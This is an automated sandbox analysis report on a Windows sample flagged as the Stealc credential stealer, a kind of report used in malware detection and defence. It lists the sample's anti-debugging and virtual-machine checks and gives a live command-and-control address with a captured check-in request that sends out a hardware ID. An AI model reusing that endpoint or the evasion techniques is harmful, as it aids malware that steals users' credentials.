              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007D16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_007F1BF0
              Source: file.exe, file.exe, 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.1770105162.0000000001285000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1770105162.00000000012BC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1770105162.00000000012B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.1770105162.000000000123E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25621
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25493
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25629
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25474
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25641
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D4A60 VirtualProtect 00000000,00000004,00000100,?0_2_007D4A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007F6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F6390 mov eax, dword ptr fs:[00000030h]0_2_007F6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_007F2A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7112, type: MEMORYSTR
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_007F4610
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_007F46A0
              Source: file.exe, file.exe, 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_007F2D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F2B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_007F2B60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_007F2A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_007F2C10

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000000.00000003.1714259793.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1770105162.000000000123E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7112, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000000.00000003.1714259793.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1770105162.000000000123E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7112, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter
              1
              Create Account
              11
              Process Injection
              1
              Masquerading
              OS Credential Dumping2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              2
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              33
              Virtualization/Sandbox Evasion
              LSASS Memory641
              Security Software Discovery
              Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools
              Security Account Manager33
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection
              NTDS13
              Process Discovery
              Distributed Component Object ModelInput Capture12
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information
              LSA Secrets1
              Account Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information
              Cached Domain Credentials1
              System Owner/User Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing
              DCSync1
              File and Directory Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc Filesystem324
              System Information Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://185.215.113.206/c4becf79229cb002.phpC9l100%Avira URL Cloudmalware
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                high
                http://185.215.113.206/false
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.206/c4becf79229cb002.php/file.exe, 00000000.00000002.1770105162.00000000012A0000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://185.215.113.206file.exe, 00000000.00000002.1770105162.000000000123E000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://185.215.113.206/kfile.exe, 00000000.00000002.1770105162.00000000012A0000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://185.215.113.206/c4becf79229cb002.phpC9lfile.exe, 00000000.00000002.1770105162.0000000001285000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        185.215.113.206
                        unknownPortugal
                        206894WHOLESALECONNECTIONSNLtrue
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1560183
                        Start date and time:2024-11-21 14:25:08 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 2m 45s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:1
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 79%
                        • Number of executed functions: 19
                        • Number of non-executed functions: 115
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: file.exe
                        No simulations
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        185.215.113.206file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousLummaCBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousLummaCBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousLummaCBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        No context
                        No context
                        No created / dropped files found
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.94288861362913
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'771'008 bytes
                        MD5:215acb5ad199adeadc4c630b59f09d17
                        SHA1:76609d0d3867fa6d84da0958b5c1a954e8643f49
                        SHA256:4596bafc0efc36a8f3ec2574dba1e8ae82e5b6051a2b5cce1605057a20855072
                        SHA512:358b95a6dc92baed9822c95f23fb13196f712ab4c92587a0b13feb35649ee09ecf63b01218cdb436542e0893a824c2b09d61cd1670b879d23fd08c2ce247a850
                        SSDEEP:49152:ix2ytIT3b5pKzATXNqChzHkgcooX7hXyM:i2T3NpeATXdJHkrpC
                        TLSH:6385330342FB2D37FD2A6FB71F54AE8B03455AE99C7DD0A938C915A6588E8FC5DB8040
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                        Icon Hash:90cececece8e8eb0
                        Entrypoint:0xa7f000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                        Instruction
                        jmp 00007F89346A13EAh
                        pmulhuw mm3, qword ptr [edx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add cl, ch
                        add byte ptr [eax], ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x1ac.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        0x10000x2490000x16200e7d3a59f268adc480e251a1e56cc9e1dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x24a0000x1ac0x200b555812a30166f2821e4d9ee97905df5False0.580078125data4.537163958937117IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        0x24c0000x29b0000x2009e25d98fda001af2f290b075bcbf5010unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        smwmjzky0x4e70000x1970000x196600cee3b4c230a835b20eb8354ba2d13df3False0.9950201620655184data7.9542409531412455IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        galsdkjy0x67e0000x10000x600f53fa8c661f54c332ea7f21598e544b0False0.5625data4.953353825760866IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .taggant0x67f0000x30000x220054f5e0f2db4147eff14b06dcb3e84b02False0.006548713235294118DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_MANIFEST0x67d43c0x152ASCII text, with CRLF line terminators0.6479289940828402
                        DLLImport
                        kernel32.dlllstrcpy
                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-11-21T14:26:09.407143+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.20680TCP
                        TimestampSource PortDest PortSource IPDest IP
                        Nov 21, 2024 14:26:07.511454105 CET4973080192.168.2.4185.215.113.206
                        Nov 21, 2024 14:26:07.631191969 CET8049730185.215.113.206192.168.2.4
                        Nov 21, 2024 14:26:07.631382942 CET4973080192.168.2.4185.215.113.206
                        Nov 21, 2024 14:26:07.631836891 CET4973080192.168.2.4185.215.113.206
                        Nov 21, 2024 14:26:07.751394987 CET8049730185.215.113.206192.168.2.4
                        Nov 21, 2024 14:26:08.962662935 CET8049730185.215.113.206192.168.2.4
                        Nov 21, 2024 14:26:08.962729931 CET4973080192.168.2.4185.215.113.206
                        Nov 21, 2024 14:26:08.965436935 CET4973080192.168.2.4185.215.113.206
                        Nov 21, 2024 14:26:09.084991932 CET8049730185.215.113.206192.168.2.4
                        Nov 21, 2024 14:26:09.407078981 CET8049730185.215.113.206192.168.2.4
                        Nov 21, 2024 14:26:09.407143116 CET4973080192.168.2.4185.215.113.206
                        Nov 21, 2024 14:26:12.189977884 CET4973080192.168.2.4185.215.113.206
                        • 185.215.113.206
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.449730185.215.113.206807112C:\Users\user\Desktop\file.exe
                        TimestampBytes transferredDirectionData
                        Nov 21, 2024 14:26:07.631836891 CET90OUTGET / HTTP/1.1
                        Host: 185.215.113.206
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Nov 21, 2024 14:26:08.962662935 CET203INHTTP/1.1 200 OK
                        Date: Thu, 21 Nov 2024 13:26:08 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Nov 21, 2024 14:26:08.965436935 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----GDHIEHJEBAAFIDHJEBGI
                        Host: 185.215.113.206
                        Content-Length: 211
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 43 41 42 39 37 39 38 44 45 32 33 39 32 34 36 39 36 33 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 2d 2d 0d 0a
                        Data Ascii: ------GDHIEHJEBAAFIDHJEBGIContent-Disposition: form-data; name="hwid"DFCAB9798DE23924696330------GDHIEHJEBAAFIDHJEBGIContent-Disposition: form-data; name="build"mars------GDHIEHJEBAAFIDHJEBGI--
                        Nov 21, 2024 14:26:09.407078981 CET210INHTTP/1.1 200 OK
                        Date: Thu, 21 Nov 2024 13:26:09 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 59 6d 78 76 59 32 73 3d
                        Data Ascii: YmxvY2s=


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Target ID:0
                        Start time:08:26:03
                        Start date:21/11/2024
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\file.exe"
                        Imagebase:0x7d0000
                        File size:1'771'008 bytes
                        MD5 hash:215ACB5AD199ADEADC4C630B59F09D17
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1714259793.0000000005190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1770105162.000000000123E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        Reset < >

                          Execution Graph

                          Execution Coverage:5.2%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:16.2%
                          Total number of Nodes:1410
                          Total number of Limit Nodes:28
